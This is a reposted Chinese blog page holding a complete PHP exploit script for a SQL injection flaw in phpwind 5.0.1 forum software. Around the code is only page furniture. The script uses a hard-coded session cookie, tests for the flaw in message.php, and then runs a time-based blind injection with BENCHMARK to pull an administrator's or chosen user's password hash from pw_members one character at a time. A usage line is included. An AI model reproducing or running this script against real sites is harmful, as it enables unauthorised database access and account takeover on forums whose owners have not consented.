phpwindexp.php,phpwind 5.0.1 Sql注射漏洞利用程序

print_r(”+――――――――――――――――――――――+

phpwind 5.0.1 Sql注射漏洞利用程序

By loveshell[at]0×27.com

欢迎访问 [[url]http://www.0[/url]×27.com]

国内最专业最及时的web漏洞发放站点

用法: c:\php5\php.exe phpwindexp.php [url]www.0[/url]×27.com /bbs/ 2

事先请修改下面的$cookie和$useragent项

+――――――――――――――――――――――+

“);

ini_set(”max_execution_time”,0);

error_reporting(7);

$bbspath=”$argv[2]”;

$server=”$argv[1]”;

$cookie=’aa102_c_stamp=1173176226; aa102_lastfid=0; aa102_ol_offset=47369; aa102_ipstate=1173162314; aa102_sid=f902d0ad; aa102_online1=yes; aa102_ck_info=%2F%09; aa102_winduser=AgYAOVRWCQNTC1QAAw4AWlAABFFSUVYMVVVbAFQGVFIGVlAH; aa102_lastvisit=0%091173176226%09%2Findex.php%3F’;

$useragent=”Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)”;

$uid=intval($argv[3])>0 ? intval($argv[3]):1;

echo “\r\n#Logging\t……..”;

if(islogin()) echo “Login Ok!\r\n”;

else die(”Not Login!\tCheck Your Cookie and Useragent!\r\n”);

echo “#Testing\t……..”;

if(test()) echo “Vul!\r\n”;

else die(”Not Vul”);

$hashtable=’0123456789abcdef’;

$count=0;

echo “#Cracking\t\r\n\r\n”;

for($i=1;$i<=16;$i++){

echo “第\t$i\t位:”;

$subpass=crack($i+8);

$password=$password.$subpass;

echo “$subpass\r\n”;

}

echo “Password:\t$password”;

echo “\r\nGood Luck $count Times\r\n”;

function send($cmd,$path)

{

global $bbspath,$server,$cookie,$count,$useragent,$debug,$evilip;

$path=$bbspath.”$path”;

$message = “POST “.$path.” HTTP/1.1\r\n”;

$message .= “Accept: */*\r\n”;

$message .= “Accept-Language: zh-cn\r\n”;

$message .= “Referer: http://”.$server.$path.”\r\n”;

$message .= “Content-Type: application/x-www-form-urlencoded\r\n”;

$message .= “User-Agent: “.$useragent.”\r\n”;

$message .= “Host: “.$server.”\r\n”;

$message .= “Content-length: “.strlen($cmd).”\r\n”;

$message .= “Connection: Keep-Alive\r\n”;

$message .= “Cookie: “.$cookie.”\r\n”;

$message .= “\r\n”;

$message .= $cmd.”\r\n”;

$count=$count+1;

$fd = fsockopen( $server, 80 );

fputs($fd,$message);

$resp = ”

"; while($fd&&!feof($fd)) { $resp .= fread($fd,1024); } fclose($fd); $resp .="

“;

if($debug) {echo $cmd;echo $resp;}

// echo $resp;

return $resp;

}

function sqlject($sql){

global $uid;

$data=’action=pubmsg&readmsg=0)’;

$data=$data.” union select BENCHMARK(1000000,md5(12345)) from pw_members where uid=$uid and $sql”.’/*’;

$echo=send($data,’message.php’);

preg_match(”/Total (.*)\(/i”,$echo,$matches);

if($matches[1]>2) return 1;

else return 0;

}

function test(){

global $uid;

$data=’action=pubmsg&readmsg=0)’;

$echo=send($data,’message.php’);

if(strpos($echo,’MySQL Server Error’)) return 1;

else return 0;

}

function islogin(){

global $uid;

$data=’action=pubmsg&readmsg=0)’;

$echo=send($data,’message.php’);

if(strpos($echo,’login.php”‘)) return 0;

else return 1;

}

function crack($i){

global $hashtable;

$sql=”mid(password,$i,1)>0x”.bin2hex(’8′);

if(sqlject($sql)){

$a=8;

$b=15;}

else {

$a=0;

$b=8;

}

for($tmp=$a;$tmp<=$b;$tmp++){

$sql=”mid(password,$i,1)=0x”.bin2hex($hashtable[$tmp]);

if(sqlject($sql)) return $hashtable[$tmp];

}

crack($i);

}

?>

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值